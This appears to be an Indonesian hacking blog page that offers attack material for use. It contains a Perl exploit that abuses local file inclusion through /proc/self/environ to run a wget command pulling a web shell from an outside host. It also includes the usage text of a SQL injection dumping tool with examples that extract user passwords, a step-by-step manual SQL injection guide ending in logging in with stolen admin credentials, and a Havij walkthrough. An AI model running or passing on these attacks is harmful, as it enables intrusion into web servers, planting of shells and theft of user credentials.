#!/usr/bin/perl
# Simple Shell Uploader via LFI Bugz (/proc/self/environ)
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
if (@ARGV != 2) { print "\n[!] perl $0 <target> <bug>\n"; exit(); }
$target = $ARGV[0];
$lfibug = $ARGV[1];
$environ = '../../../../../../../../../../../../../../../proc/self/environ';
$host = '';
$path = '';
if ($target =~ /http:\/\// ) { $target = str_replace($target,"http:\/\/",''); }
if ($target =~ /^(.+?)\/(.+)$/) { ($host,$path) = ($1,$2); } else { $host = $target; }
$xpl = $target.'/'.$lfibug.$environ;
$content = get_content($xpl);
if ($content =~ /HTTP_USER_AGENT=/) {
print "\n[~] Hancurkan $host ... \n";
my $cmd = "<?system(\'wget http:\/\/pacenoge.org\/tool\/simple_shell.txt -O article.php\');?>";
my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or die("\n[!] $host -> Koneksi Gagal !!!\n");
print $sock "GET /".$path.'/'.$lfibug.$environ." HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
close($sock);
sleep(2);
my $check = get_content($target.'/n0va.php');
if (($check =~ /<h1>NoGe WazZ HeRe<\/h1>/) or ($check =~ /<title>NoGe S!mPLe SHeLL<\/title>/)) {
print "\n[+] 3SUCCESS -> http://".$target."/n0va.php \n";
}
else { print "\n[!] Gagal.\n"; }
}
else { print "\n[!] $host -> Tidak Terdapat \"HTTP_USER_AGENT\"\n"; }
Download : n0va.txt
Kamis, 26 Juli 2012
Simple Shell Uploader via LFI
Senin, 01 Agustus 2011
Top 15 Security/Hacking Tools & Utilities
1. Nmap
Download Nmap Here
2. Nessus Remote Security Scanner
Download Nessus Here
3. John the Ripper
Download JTR Here
4. Nikto
Download Nikto Here
5. SuperScan
Download SuperScan Here
6. p0f
Download p0f Here
7. Wireshark (Formely Ethereal)
Download Wireshark Here
8. Yersinia
Download Yersinia Here
9. Eraser
Download Eraser Here
10. PuTTY
Download PuTTY Here
11. LCP
Download LCP Here
12. Cain and Abel
Download Cain and Abel Here
13. Kismet
Download Kismet Here
14. NetStumbler
Download NetStumbler Here
15. hping
Download hping Here
Refrensi : digg
Minggu, 23 Januari 2011
Schemafuzz
#!/usr/bin/python
################################################################
# .___ __ _______ .___
# __| _/____ _______| | __ ____ \ _ \ __| _/____
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\
# \/ \/ \/
# ___________ ______ _ __
# _/ ___\_ __ \_/ __ \ \/ \/ /
# \ \___| | \/\ ___/\ /
# \___ >__| \___ >\/\_/
# est.2007 \/ \/ forum.darkc0de.com
################################################################
# MySQL Injection Schema, Dataext, and fuzzer
# Share the c0de!
# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx,
# and the darkc0de crew
# NOTES:
# Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy
# will not be used. This is a effort to keep the script from getting stuck in a endless loop.
# Any other questions Hit the forums and ask questions. google is your friend!
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!
# BE WARNED, THIS TOOL IS VERY LOUD..
#Set default evasion options here
print " Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com"
print "\tModes:"
print "\tDefine: --dbs Shows all databases user has access too. MySQL v5+"
print "\tDefine: --schema Enumerate Information_schema Database. MySQL v5+"
print "\tDefine: --full Enumerates all databases information_schema table MySQL v5+"
print "\tDefine: --dump Extract information from a Database, Table and Column. MySQL v4+"
print "\tDefine: --fuzz Fuzz Tables and Columns. MySQL v4+"
print "\tDefine: --findcol Finds Columns length of a SQLi MySQL v4+"
print "\tDefine: --info Gets MySQL server configuration only. MySQL v4+"
print "\n\tRequired:"
print "\tDefine: -u URL \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print "\n\tMode dump and schema options:"
print "\tDefine: -D \"database_name\""
print "\tDefine: -T \"table_name\""
print "\tDefine: -C \"column_name,column_name...\""
print "\n\tOptional:"
print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
print "\tDefine: -o \"ouput_file_name.txt\" Default is schemafuzzlog.txt"
print "\tDefine: -r row number to start at"
print "\tDefine: -v Verbosity off option. Will not display row #'s in dump mode."
print "\n Ex: ./schemafuzz.py --info -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print " Ex: ./schemafuzz.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
print " Ex: ./schemafuzz.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D catalog -T orders -r 200"
print " Ex: ./schemafuzz.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D joomla -T jos_users -C username,password"
print " Ex: ./schemafuzz.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -end \"/*\" -o sitelog.txt"
print " Ex: ./schemafuzz.py --findcol -u \"www.site.com/news.php?id=22\""
Download di sini
Jumat, 07 Januari 2011
Albaloo 1.00 Web Vulnerability Scanner
Minggu, 26 Desember 2010
Manual SQL Injection
- Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/news.php?id=100
- Tambahkan tanda ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error. Contoh : http://www.target.com/news.php?id=100' atau http://www.target.com/news.php?id=-100 | Maka akan muncul pesan error... | "You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1" Dan masih banyak lagi macamnya.|
- selanjutnya adalah mencari dan menghitung jumlah table yang ada dalam databasenya... Disini kita akan menggunakan perintah order by. Contoh : http://www.target.com/news.php?id=100+order+by+1/* | "/*" ? adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja... | Kalau "+" sebagai penghubung perintah... | Nah sampe sini langsung dah nyobain satu2... | http://www.target.com/news.php?id=100+order+by+1/* (gak ada error) | http://www.target.com/news.php?id=100+order+by+2/* (gak ada error) | http://www.target.com/news.php?id=100+order+by+3/* (gak ada error) | http://www.target.com/news.php?id=100+order+by+4/* (jangan nyerah) | Sampai muncul error... | Misalkan errornya disini... | http://www.target.com/news.php?id=100+order+by+10/* | Berarti yang kita ambil adalah "9" | http://www.target.com/news.php?id=100+order+by+9/*
- Untuk mengetahui berapa angka yang show sekarang kita pake UNION Contoh : http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/* | Trus perhatikan angka berapa yang keluar. | Misalnya angka yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version" | http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/* Atau http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
- Nah kalau versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database... Contoh : http://www.target.com/news.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
- Misalnya yang lo liat adalah table "admin" Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya... Contoh: | http://www.target.com/news.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/* | Misalnya kolom yang keluar adalah "password" dan "username" Langsung aja kita liat isinya... | Contoh : http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/* dan http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
- Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda...
Simple Shell Uploader via LFI
- perl lampunghacker.txt lampungcyber.org / "index.php?option=com_ckforms&controller=" atau
- perl lampunghacker.txt lampungcyber.web.id /pcprintersolutixxx/ "index.php?option=com_ckforms&controller="
Havij v1.1: Advanced SQL Injection
- Install Softwere Havij | bisa di download di sini
- Setelah di install buka softwere Havij
- Masukkan target : contoh http://targetsasaran.com/product.php?pid=4 | klick analize | tunggu sampai selesai
- kemudian | Klick tables |klick get tables | tunggu sampai selesai
- kemudian ceklist salah satu tables yang ingin | klick get Colomns | tunggu sampai selesai
- Kemudian ceklist salah satu colomns yang di inginkan | click get data | tunggu sampai selesai
- dapat deh data yang di inginkan ....
